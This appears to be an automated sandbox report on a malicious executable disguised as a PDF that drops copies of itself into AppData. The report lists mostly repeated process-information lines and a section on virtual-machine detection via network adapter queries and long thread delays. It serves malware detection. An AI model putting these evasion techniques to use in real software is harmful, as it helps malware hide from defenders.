                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 1792, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 77B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeMemory allocated: 4840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 4F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 7940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 8940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 8AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 9AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 31D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 3350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeMemory allocated: 5350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 1700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3260000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5260000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 7B00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8B00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3020000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3070000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5070000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: BF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 25C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 24F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 7030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 81D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 91D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 1510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3040000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 5040000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599743Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599187Jump to behavior
